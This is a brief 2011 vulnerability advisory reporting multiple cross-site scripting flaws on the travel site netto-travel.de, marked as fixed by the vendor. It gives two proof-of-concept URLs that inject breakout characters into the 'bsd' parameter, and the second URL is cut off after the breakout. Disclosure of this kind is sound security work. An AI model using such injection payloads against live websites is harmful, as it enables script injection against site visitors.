Advisory: Multiple XSS vulnerabilities on http://www.netto-travel.de/
Advisory ID: SSCHADV2011-009
Author: Stefan Schurtz
Affected Software: http://www.netto-travel.de/
Vendor URL: http://www.netto-travel.de/
Vendor Status: fixed
CVE-ID: -
==========================
Vulnerability Description:
==========================
The website "www.netto-travel.de" is prone to multiple XSS vulnerabilities
==================
Technical Details:
==================
http://www.netto-travel.de/web/?abflughafen3L=-1&anzErw=1&bsd='"&dauer=0&idreiseart=-1&ka1=1&ka2=1&ka3=1&maxDatumBis=22.08.2019&reisebudget=2&reiseziel=-1&vnd=15.08.2011
http://www.netto-travel.de/web/index.cfm?abflughafen3L=-1&anzErw=1&bsd=">